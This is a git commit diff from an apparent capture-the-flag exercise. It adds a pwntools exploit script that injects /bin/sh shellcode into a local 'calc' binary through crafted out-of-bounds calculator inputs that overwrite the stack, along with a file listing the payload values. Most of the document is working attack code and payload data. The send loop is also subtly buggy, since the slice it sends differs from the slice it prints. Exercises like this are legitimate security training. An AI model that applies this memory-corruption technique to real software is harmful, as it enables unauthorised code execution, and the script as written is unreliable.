diff options
-rwxr-xr-x | bruh.py | 5 | ||||
-rw-r--r-- | calc.i64 | bin | 8368587 -> 8368587 bytes | |||
-rw-r--r-- | core | bin | 0 -> 983040 bytes | |||
-rwxr-xr-x | exploit.py | 26 | ||||
-rw-r--r-- | sout | 1 | ||||
-rw-r--r-- | stest | 16 |
6 files changed, 41 insertions, 7 deletions
diff --git a/bruh.py b/bruh.py deleted file mode 100755 index ca71230..0000000 --- a/bruh.py +++ /dev/null @@ -1,5 +0,0 @@ -#!/usr/bin/env python3 -for x in range(147460): - print("99", end='') -print("") - Binary files differBinary files differdiff --git a/exploit.py b/exploit.py new file mode 100755 index 0000000..b765e85 --- /dev/null +++ b/exploit.py @@ -0,0 +1,26 @@ +#!/usr/bin/env python3 +from pwn import * + + +context.binary = './calc' + +shellcode = asm(shellcraft.sh()) + +pid = process("./calc") + +print(shellcode.hex()) +print(context) + +shellen = len(shellcode) + +for exec_num,offset in enumerate(reversed(range(361, int(len(shellcode) / 4) + 361))): + pid.sendline("+{}+{}".format(offset, int.from_bytes(shellcode[((exec_num + 1) * 1):(exec_num * 4)], 'big'))) + print("+{}+{}".format(offset, int.from_bytes(shellcode[shellen - ((exec_num + 1) * 4):shellen - (exec_num * 4)], 'big'))) + + +pid.sendline("+360+135151459") +print("+360+135151459") +#pid.interactive() + +print(pid.recv()) + @@ -0,0 +1 @@ +=== Welcome to SECPROG calculator === @@ -1,2 +1,14 @@ --7+1234 --8+134517012 ++371+795371626 ++370+1752379183 ++369+1852400175 ++368+23651209 ++367+2164326657 ++366+1769088052 ++365+3375431937 ++364+1493461585 ++363+2303844609 ++362+1792160225 ++361+2160941067 ++360+135151459 +bruh + |